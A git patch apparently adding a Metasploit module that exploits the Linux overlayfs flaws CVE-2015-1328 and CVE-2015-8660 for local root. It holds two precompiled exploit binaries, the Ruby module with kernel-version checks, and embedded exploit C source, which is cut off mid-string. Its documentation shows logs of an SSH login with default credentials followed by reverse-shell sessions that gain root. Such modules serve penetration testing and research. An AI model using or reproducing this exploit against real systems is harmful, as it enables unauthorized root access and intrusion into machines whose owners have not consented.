From 27cf5c65c4f15a46d408c230214b8e50228dac2f Mon Sep 17 00:00:00 2001 From: h00die Date: Tue, 4 Oct 2016 23:21:53 -0400 Subject: [PATCH] working module --- data/exploits/CVE-2015-1328/1328 | Bin 0 -> 13655 bytes data/exploits/CVE-2015-8660/8660 | Bin 0 -> 13564 bytes .../exploit/linux/local/overlayfs_priv_esc.md | 180 +++++++ .../linux/local/overlayfs_priv_esc.rb | 458 ++++++++++++++++++ 4 files changed, 638 insertions(+) create mode 100644 data/exploits/CVE-2015-1328/1328 create mode 100644 data/exploits/CVE-2015-8660/8660 create mode 100644 documentation/modules/exploit/linux/local/overlayfs_priv_esc.md create mode 100644 modules/exploits/linux/local/overlayfs_priv_esc.rb 
diff --git a/data/exploits/CVE-2015-1328/1328 b/data/exploits/CVE-2015-1328/1328 new file mode 100644 index 0000000000000000000000000000000000000000..872f097cf2fcf7fc58fc9cd2921a07b2edaf2d81 GIT binary patch literal 13655 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 literal 0 HcmV?d00001 
diff --git a/data/exploits/CVE-2015-8660/8660 b/data/exploits/CVE-2015-8660/8660 new file mode 100644 index 0000000000000000000000000000000000000000..532d81071c034536e49217a5241e87f297252c57 GIT binary patch literal 13564 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 literal 0 HcmV?d00001 diff --git a/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md b/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md new file mode 100644 index 0000000000..f8fb582497 --- /dev/null +++ b/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md 
@@ -0,0 +1,180 @@
+## Creating A Testing Environment
+
+This module has been tested against:
+
+ 1. CVE-2015-1328
+ 1. Ubuntu 14.04
+ 1. 3.13.0-24 (binary version of exploit compiled on)
+ 2. 3.19.0-20
+ 3. 3.19.0-21 (not vuln, exploit failed)
+ 4. 3.13.0-55 (not vuln, exploit failed)
+ 2. CVE-2015-8660
+ 1. Ubuntu 14.04
+ 1. 3.19.0-41 (binary version of exploit compiled on)
+
+Untested against
+
+ 1. Fedora (code included to identify vuln versions)
+ 2. Redhat (description includes vuln kernel versions)
+
+## Verification Steps
+
+ 1. Start msfconsole
+ 2. Exploit a box via whatever method
+ 4. Do: `use exploit/linux/local/overlayfs_priv_esc`
+ 5. Do: `set session #`
+ 6. Do: `set verbose true`
+ 7. Do: `exploit`
+
+## Options
+
+ **COMPILE**
+
+ If we should attempt to compile on the system. Defaults to Auto, which checks if `gcc` is installed
+
+ **WritableDir**
+
+ A folder we can write files to. Defaults to /tmp
+
+## Scenarios
+
+### CVE-2015-8660 against Ubuntu 14.04 with kernel 3.19.0-41
+
+#### Initial Access
+
+ resource (/root/Text-1.txt)> use auxiliary/scanner/ssh/ssh_login
+ resource (/root/Text-1.txt)> set rhosts 192.168.2.156
+ rhosts => 192.168.2.156
+ resource (/root/Text-1.txt)> set username ubuntu
+ username => ubuntu
+ resource (/root/Text-1.txt)> set password ubuntu
+ password => ubuntu
+ resource (/root/Text-1.txt)> exploit
+ [*] SSH - Starting bruteforce
+ [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 3.19.0-41-generic #46~14.04.2-Ubuntu SMP Tue Dec 8 17:46:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux '
+ [!] No active DB -- Credential data will not be saved!
+ [*] Command shell session 1 opened (192.168.2.117:39027 -> 192.168.2.156:22) at 2016-10-04 22:48:44 -0400
+ [*] Scanned 1 of 1 hosts (100% complete)
+ [*] Auxiliary module execution completed
+
+#### Escalate
+
+ resource (/root/Text-1.txt)> use exploit/linux/local/overlayfs_priv_esc
+ resource (/root/Text-1.txt)> set verbose true
+ verbose => true
+ resource (/root/Text-1.txt)> set payload linux/x86/shell/reverse_tcp
+ payload => linux/x86/shell/reverse_tcp
+ resource (/root/Text-1.txt)> set session 1
+ session => 1
+ resource (/root/Text-1.txt)> set target 1
+ target => 1
+ resource (/root/Text-1.txt)> set lhost 192.168.2.117
+ lhost => 192.168.2.117
+ resource (/root/Text-1.txt)> exploit
+ [*] Started reverse TCP handler on 192.168.2.117:4444
+ [*] Checking if mount points exist
+ [+] /tmp/haxhax not created
+ [+] Kernel 3.19.0.pre.41.pre.generic is vulnerable to CVE-2015-8660
+ [+] gcc is installed
+ [*] Live compiling exploit on system
+ [*] Checking if mount points exist
+ [+] /tmp/haxhax not created
+ [+] Kernel 3.19.0.pre.41.pre.generic is vulnerable to CVE-2015-8660
+ [*] Writing to /tmp/svF1U2Ya.c (2356 bytes)
+ [*] Max line length is 65537
+ [*] Writing 2356 bytes in 1 chunks of 8098 bytes (octal-encoded), using printf
+ [*] Compiling /tmp/svF1U2Ya.c
+ [*] Writing to /tmp/fHCJO1ex (155 bytes)
+ [*] Max line length is 65537
+ [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
+ [*] Exploiting...
+ [*] Sending stage (36 bytes) to 192.168.2.156
+ [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:44823) at 2016-10-04 22:48:57 -0400
+ [+] Deleted /tmp/svF1U2Ya.c
+ [+] Deleted /tmp/fHCJO1ex
+
+ 3986817421
+ viRVXKxRruOuDKwEBYAscFvJPPrtQbTO
+ true
+ zxrnfClHzgOcewXyEqQeEAcHsQmsEPtk
+ cqdStYFUGluqJkpgfGAkPvcVgoKTtJlY
+ EOzlAFTpQsoXMWIicFiKHxsVjjlFpspC
+ true
+ FgIyOJMyeREcjxpsbWkNDZNtuUGYmBtt
+ omnusQCOqEdrUTbMLtDmXibhFAVQuTAz
+ VPsVgFTxVwskShumsJkambKWMQhifDJi
+ whoami
+ root
+ uname -a
+ Linux Ubuntu14 3.19.0-41-generic #46~14.04.2-Ubuntu SMP Tue Dec 8 17:46:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
+
+### CVE-2015-1328 against Ubuntu 14.04 with kernel 3.13.0-24
+
+#### Initial Access
+
+ resource (/root/Text-1.txt)> use auxiliary/scanner/ssh/ssh_login
+ resource (/root/Text-1.txt)> set rhosts 192.168.2.156
+ rhosts => 192.168.2.156
+ resource (/root/Text-1.txt)> set username ubuntu
+ username => ubuntu
+ resource (/root/Text-1.txt)> set password ubuntu
+ password => ubuntu
+ resource (/root/Text-1.txt)> exploit
+ [*] SSH - Starting bruteforce
+ [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
+ [!] No active DB -- Credential data will not be saved!
+ [*] Command shell session 1 opened (192.168.2.117:42139 -> 192.168.2.156:22) at 2016-10-04 22:54:50 -0400
+ [*] Scanned 1 of 1 hosts (100% complete)
+ [*] Auxiliary module execution completed
+
+#### Escalate
+
+ resource (/root/Text-1.txt)> use exploit/linux/local/overlayfs_priv_esc
+ resource (/root/Text-1.txt)> set verbose true
+ verbose => true
+ resource (/root/Text-1.txt)> set payload linux/x86/shell/reverse_tcp
+ payload => linux/x86/shell/reverse_tcp
+ resource (/root/Text-1.txt)> set session 1
+ session => 1
+ resource (/root/Text-1.txt)> set target 0
+ target => 0
+ resource (/root/Text-1.txt)> set lhost 192.168.2.117
+ lhost => 192.168.2.117
+ resource (/root/Text-1.txt)> exploit
+ [*] Started reverse TCP handler on 192.168.2.117:4444
+ [*] Checking if mount points exist
+ [+] /tmp/ns_sploit not created
+ [+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
+ [+] gcc is installed
+ [*] Live compiling exploit on system
+ [*] Checking if mount points exist
+ [+] /tmp/ns_sploit not created
+ [+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
+ [*] Writing to /tmp/k4JlQwrx.c (4375 bytes)
+ [*] Max line length is 65537
+ [*] Writing 4375 bytes in 1 chunks of 15306 bytes (octal-encoded), using printf
+ [*] Compiling /tmp/k4JlQwrx.c
+ [*] Writing to /tmp/cjKriIIN (155 bytes)
+ [*] Max line length is 65537
+ [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
+ [*] Exploiting...
+ [*] Sending stage (36 bytes) to 192.168.2.156
+ [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:57869) at 2016-10-04 22:55:04 -0400
+ [+] Deleted /tmp/k4JlQwrx.c
+ [+] Deleted /tmp/cjKriIIN
+
+ 3437009797
+ lGTsPkjgaOAhZPAssSiPBdigTNuavPNA
+ true
+ zQgQeZUDzBZvCUelOYXjpIviozSnTjoE
+ ZaGCLiKvvhyTawBwPHNqidQSerdmxDYE
+ WjOaBQVXdxHBiVdomUBMRRrnLOPUGfGD
+ true
+ DgSZZHBIFrsBMvyRTBNSBTcRmVMZXMyx
+ bwHnnuHwZAvSsZoYLhNrcuRDIKuqPRWu
+ NfNIsINldyrgOLLagCPIQiQsZqTsmUec
+ sh: 0: can't access tty; job control turned off
+ # whoami
+ root
+ # uname -a
+ Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
diff --git a/modules/exploits/linux/local/overlayfs_priv_esc.rb b/modules/exploits/linux/local/overlayfs_priv_esc.rb
new file mode 100644
index 0000000000..73c973009d
--- /dev/null
+++ b/modules/exploits/linux/local/overlayfs_priv_esc.rb
@@ -0,0 +1,458 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = GoodRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Overlayfs Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to exploit two different CVEs related to overlayfs.
+ CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
+ 3.16.0-25 (14.10 default) < 3.16.0-41
+ 3.19.0-18 (15.04 default) < 3.19.0-21
+ CVE-2015-8660:
+ Ubuntu:
+ 3.19.0-18 < 3.19.0-43
+ 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10)
+ Fedora:
+ < 4.2.8 (vulnerable, un-tested)
+ Red Hat:
+ < 3.10.0-327 (rhel 6, vulnerable, un-tested)
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'h00die ', # Module
+ 'rebel' # Discovery
+ ],
+ 'DisclosureDate' => 'Jun 16 2015',
+ 'Platform' => [ 'linux'],
+ 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' =>
+ [
+ [ 'CVE-2015-1328', { } ],
+ [ 'CVE-2015-8660', { } ]
+ ],
+ 'DefaultTarget' => 1,
+ 'DefaultOptions' =>
+ {
+ 'payload' => 'linux/x86/shell/reverse_tcp' # for compatibility due to the need on cve-2015-1328 to run /bin/su
+ },
+ 'References' =>
+ [
+ [ 'EDB', '39166'], # CVE-2015-8660
+ [ 'EDB', '37292'], # CVE-2015-1328
+ [ 'CVE', '2015-1328'],
+ [ 'CVE', '2015-8660']
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
+ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+ ], self.class)
+ end
+
+ def check
+ def mounts_exist?()
+ vprint_status('Checking if mount points exist')
+ if target.name == 'CVE-2015-1328'
+ if not directory?('/tmp/ns_sploit')
+ vprint_good('/tmp/ns_sploit not 
created')
+ return true
+ else
+ print_error('/tmp/ns_sploit directory exists. Please delete.')
+ return false
+ end
+ elsif target.name == 'CVE-2015-8660'
+ if not directory?('/tmp/haxhax')
+ vprint_good('/tmp/haxhax not created')
+ return true
+ else
+ print_error('/tmp/haxhax directory exists. Please delete.')
+ return false
+ end
+ end
+ end
+
+ def kernel_vuln?()
+ os_id = cmd_exec('grep ^ID= /etc/os-release')
+ case os_id
+ when 'ID=ubuntu'
+ kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
+ case kernel.release.to_s
+ when '3.13.0'
+ if kernel.between?(Gem::Version.new('3.13.0-24-generic'),Gem::Version.new('3.13.0-54-generic'))
+ vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
+ return true
+ else
+ print_error("Kernel #{kernel} is NOT vulnerable")
+ return false
+ end
+ when '3.16.0'
+ if kernel.between?(Gem::Version.new('3.16.0-25-generic'),Gem::Version.new('3.16.0-40-generic'))
+ vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
+ return true
+ else
+ print_error("Kernel #{kernel} is NOT vulnerable")
+ return false
+ end
+ when '3.19.0'
+ if kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-20-generic'))
+ vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
+ return true
+ elsif kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-42-generic'))
+ vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
+ return true
+ else
+ print_error("Kernel #{kernel} is NOT vulnerable")
+ return false
+ end
+ when '4.2.0'
+ if kernel.between?(Gem::Version.new('4.2.0-18-generic'),Gem::Version.new('4.2.0-22-generic'))
+ vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
+ return true
+ else
+ print_error("Kernel #{kernel} is NOT vulnerable")
+ return false
+ end
+ else
+ print_error("Non-vuln kernel #{kernel}")
+ return false
+ end
+ when 'ID=fedora'
+ kernel = Gem::Version.new(cmd_exec('/usr/bin/uname -r').sub(/\.fc.*/, '')) # we need to remove the 
trailer after .fc + # irb(main):008:0> '4.0.4-301.fc22.x86_64'.sub(/\.fc.*/, '') + # => "4.0.4-301" + if kernel.release < Gem::Version.new('4.2.8') + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660. Exploitation UNTESTED") + return true + else + print_error("Non-vuln kernel #{kernel}") + return false + end + else + print_error("Unknown OS: #{os_id}") + return false + end + end + + if mounts_exist?() && kernel_vuln?() + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + def exploit + + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') + end + + + # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size + # Exploit Title: ofs.c - overlayfs local root in ubuntu + # Date: 2015-06-15 + # Exploit Author: rebel + # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) + # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 + # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) + + cve_2015_1328 = %q{ + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + #define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, 